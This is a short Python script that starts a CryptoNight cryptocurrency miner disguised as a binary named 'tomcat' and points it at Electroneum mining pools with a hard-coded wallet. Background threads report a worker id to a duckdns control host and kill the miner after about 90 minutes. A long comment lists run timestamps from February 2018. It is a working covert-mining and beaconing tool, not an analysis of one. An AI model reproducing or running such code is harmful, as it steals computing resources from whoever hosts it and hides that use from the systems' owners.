import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:05.664910
#2018-02-17 17:05:02.900280
#2018-02-17 18:53:06.087241
#2018-02-17 20:42:06.234978
#2018-02-17 22:29:04.101872
#2018-02-18 00:12:06.457817
#2018-02-18 02:04:07.359248
#2018-02-18 03:52:07.946312
#2018-02-18 05:41:05.732957
#2018-02-18 07:33:05.461270
#2018-02-18 09:21:06.290660
#2018-02-18 11:07:04.567599
#2018-02-18 12:54:07.005897
#2018-02-18 14:42:01.850680
#2018-02-18 16:31:06.954243
#2018-02-18 18:20:09.159027
#2018-02-18 20:07:04.424439
#2018-02-18 21:53:04.700529
#2018-02-18 23:43:05.703673
#2018-02-19 01:29:01.405579
#2018-02-19 03:17:01.264104
#2018-02-19 05:02:06.139866
#2018-02-19 06:47:07.063830
#2018-02-19 08:38:01.550987
#2018-02-19 10:27:07.695169
#2018-02-19 12:15:07.314705
#2018-02-19 14:02:08.466330
#2018-02-19 15:51:06.487391
#2018-02-19 17:39:01.698306
#2018-02-19 19:27:01.583213
#2018-02-19 21:13:04.067340
#2018-02-19 23:01:04.309810
#2018-02-20 00:44:05.525226
#2018-02-20 02:35:05.439172
#2018-02-20 04:24:07.638142
#2018-02-20 06:08:01.306234
#2018-02-20 07:53:02.051566
#2018-02-20 09:38:07.412029
#2018-02-20 11:23:09.522448
#2018-02-20 13:11:04.575953
#2018-02-20 14:58:02.048158
#2018-02-20 16:44:01.602124
#2018-02-20 18:35:07.868931
#2018-02-20 20:26:08.168459
#2018-02-20 22:12:07.867680
#2018-02-20 23:55:03.044704
#2018-02-21 01:39:07.663904
#2018-02-21 03:27:01.980386
#2018-02-21 05:15:02.058137
#2018-02-21 07:04:02.063762
#2018-02-21 08:49:04.761539
#2018-02-21 10:36:06.105056
#2018-02-21 12:24:01.739648
#2018-02-21 14:12:01.800833
#2018-02-21 15:58:05.199066
#2018-02-21 17:51:01.958000
#2018-02-21 19:36:07.787361
#2018-02-21 21:24:05.408759
#2018-02-21 23:10:09.503840
#2018-02-22 00:57:06.830230
#2018-02-22 02:47:01.414187
#2018-02-22 04:35:06.511657
#2018-02-22 06:20:03.639819
#2018-02-22 08:07:03.785766
#2018-02-22 09:54:04.718722
#2018-02-22 11:39:06.530221
#2018-02-22 13:27:01.971840
#2018-02-22 15:16:02.011614
#2018-02-22 17:01:07.362664
#2018-02-22 18:49:04.844899
#2018-02-22 20:40:11.187916
#2018-02-22 22:24:06.847370
#2018-02-23 00:11:05.583405
#2018-02-23 02:00:06.566944
#2018-02-23 03:48:07.139005
#2018-02-23 05:40:09.548281
#2018-02-23 07:25:07.431336
#2018-02-23 09:30:05.650431
#2018-02-23 11:36:01.688321
#2018-02-23 13:26:04.380594
#2018-02-23 15:11:09.858209
#2018-02-23 17:00:01.652394
#2018-02-23 18:49:05.238018
#2018-02-23 20:34:07.461749
#2018-02-23 22:22:07.156548
#2018-02-24 00:08:04.013846
#2018-02-24 01:59:03.913973
#2018-02-24 03:50:08.982706
#2018-02-24 05:38:06.959162
#2018-02-24 07:26:05.053710
#2018-02-24 09:15:06.292021
#2018-02-24 11:10:06.338830
#2018-02-24 12:58:04.606336
#2018-02-24 14:46:07.734066
#2018-02-24 16:38:07.361968
#2018-02-24 18:27:07.367096
#2018-02-24 20:14:07.595273
#2018-02-24 22:03:07.039432
#2018-02-25 01:01:06.695575
#2018-02-25 03:55:07.645239
#2018-02-25 06:39:07.357828
#2018-02-25 11:36:02.204641
#2018-02-25 13:19:01.516127
#2018-02-25 14:52:01.511877